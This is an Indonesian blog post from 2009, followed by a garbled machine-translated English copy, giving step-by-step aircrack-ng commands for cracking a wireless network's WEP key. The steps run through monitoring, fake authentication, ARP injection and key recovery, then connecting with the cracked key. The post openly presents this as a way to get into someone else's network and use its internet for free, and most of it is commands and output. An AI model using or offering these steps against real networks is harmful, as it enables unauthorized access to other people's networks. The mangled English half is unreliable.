Rabu, 11 Maret 2009

Caranya membobol WEP keys

Pada kesempatan ini, sedikit ingin membahas bagaimana seseorang mampu menembus WEP key untuk mendapatkan akses ke dalam jaringan bahkan tidak tertutup kemungkinan untuk menggunakan internet gratis.
Mungkin ada yang bertanya, apa itu wep? Dan apa fungsi wep? Apa itu dhcp? Dan lain sebagainya.. tapi kali ini, saya hanya membahas mengenai wep key saja. Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi.
Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0.
Secara umum langkah-langkahnya adalah sebagai berikut:
1. Jalankan OS Back Track v.2.0 Final dengan Laptop. Lalu cek konfigurasi adapater usb wifi dengan meggunakan shell.
Ketikkan:

Ifconfig rausb0

Iwconfig rausb0

2. Setelah konfigurasi selesai, lalu jalankan airodump-ng untuk mengetahui channel berapa yang aktif, apa nama ssidnya, mac /client berapa saja yang sudah konek, ada tidaknya filrtering mac, yang tentunya untuk memudahkan kita melakukan monitoring
dengan menggunakan shell ketikkan:

airodump-ng rausb0

3. Setelah mengetahui target berada di channel berapa, ssid nya apa, essid nya apa, ada tidaknya client yang konek, maka batalkan airodump-ng dari shell dengan menekan control+C. lalu misalnya kita ingin menyerang essid SSIDAP bssid 00:18:f8:36:83:47 operasinya di channel 8, maka untuk menangkap paket yang dipancarkan oleh AP (Access Point) tersebut maka jalankan perintah:

iwconfig rausb0 mode monitor channel 8

airodump-ng -- channel 8 --ivs -w namafile rausb0

shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng

4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan:

Aireplay-ng -1 -30 -e SSIDAP –a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

Lakukan fake authentification sampai muncul balasan jawaban:
Authentification successful
Keep live sending packet
Lakukan terus sampai mendapatkan key wep pada langkah aircrack-ng

5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command:

Aireplay-ng -3 –b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0

Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0

6. Untuk ngecrack password wep, sambil menunggu paket yang terkumpul, jalan shell baru ketikkan

aircrack-ng –e SSIDAP -b 00:18:f8:36:83:47 (namafile).ivs

lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya.
Tunggu sampai mendapat display

Key Found (B1:92:27:EF:6E) Probability 100%
7. matikan shell airodump-ng, aireplay-ng, lalu buka shell baru. Lalu lakukan otentifikasi dengan cara:

iwconfig rausb0 mode managed –e SSIDAP key B1:92:27:EF:6E

lalu lakukan otomatisasi dhcp dengan mengetikkan perintah:
dhcpcd rausb0

lalu lakukan ping ke salah satu web site misalnya:
ping yahoo.com

kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet

THE TRANSLATE IS...

Wednesday, 11 March 2009
Do break WEP keys
On this occasion, few want to discuss how someone is able to penetrate WEP key to gain access to the network does not even closed to the possibility to use the internet for free.
Which may have to ask, what is WEP? And what function WEP? What is dhcp? And so on .. but this time, I only discuss about the WEP key only. Basically, the security settings on the Access Point (AP) consists of several modes, but the average using the simple settings to make it easier to pengaksessan. Because sometimes the higher level of security then the comfort level is reduced. WEP is Wired Eqivalent Privacy, a long key 64 bitnya only 10-digit hexadecimal number or 5 digit alpha-numeric, while for 128-bit key consists of 26 hexadecimal digits or 13-digit alpha-numeric. WEP algorithm pemograman classified into the RC4 algorithm, where there are weaknesses in this ekripsi the recurrence of bytes, making it possible to dicrack variable ivs if its enough.
During the process of hacking WEP, linuk derived using the OS is slackware backtrack version 2.0 Final, and use the laptop V3103TU Compaq Presario V3000 and use the usb wireless adapter DWL-G 122 C rec v.3.0.
In general, the steps are as follows:
1. Back Track run OS v.2.0 Final with Laptops. Then check the configuration adapater with usb wifi meggunakan shell.
Type:

Ifconfig rausb0

Iwconfig rausb0

2. After configuration is complete, then run airodump-ng to find out how many channels are active, what name ssidnya, mac / client that is how it connect, there is not filrtering mac, which of course makes it easier for us to monitor
using the shell type:

airodump-ng rausb0

3. After knowing the target is in the channel, SSID it is, what its essid, there is not a client connect, then cancel airodump-ng from the shell by pressing control + C. ago for example we want to attack SSIDAP essid bssid 00:18: F8: 36:83:47 channel operating in the 8, then to catch the package that emanated by AP (Access Point) will execute the command:

iwconfig rausb0 mode monitor channel 8

airodump-ng - channel 8 - ivs-w filename rausb0

shell is not closed to get the WEP key step in the aircrack-ng

4. After that, if a little lan activity, meaning that no client connect, have to use the Fake Authentification with a new shell, then type:

Aireplay-ng -1 -30-e SSIDAP â € "a 00:18: F8: 36:83:47-h (mac address in the Allow connect) rausb0

Make fake authentification answers until a reply:
Authentification successful
Keep sending live packet
Do continue to get the WEP key step in the aircrack-ng

5 Then the shell is another way to do the injection ARP request (in this case the only card that supports a certain course to do the injection), run the command:

Aireplay-ng -3 â € "b 00:18: F8: 36:83:47-h (mac address in the Allow connect) rausb0

Then stay packages waiting to be sent and the ARP packet injection ARP request is received, the packet is received a packet ivs will be saved in a file before the first run when the shell airodump-ng - channel 8 - ivs-w filename rausb0

6. To ngecrack WEP password, pending the packet collected, new road shell type

aircrack-ng â € "e SSIDAP-b 00:18: F8: 36:83:47 (filename). ivs

ago aircrack-ng will explore all possible key wepnya.
Wait until the display gets

Found Key (B1: 92:27: EF: 6E) Probability 100%
7. turn off the shell airodump-ng, aireplay-ng, and open a new shell. Then how do Authentication with:

iwconfig rausb0 mode managed â € "e SSIDAP key B1: 92:27: EF: 6E

ago do automation dhcp command by typing:
dhcpcd rausb0

ago to do a ping to the web site for example:
ping yahoo.com

I answer from ping TTL = bla bla means you are connected to the internet

Tidak ada komentar:

Posting Komentar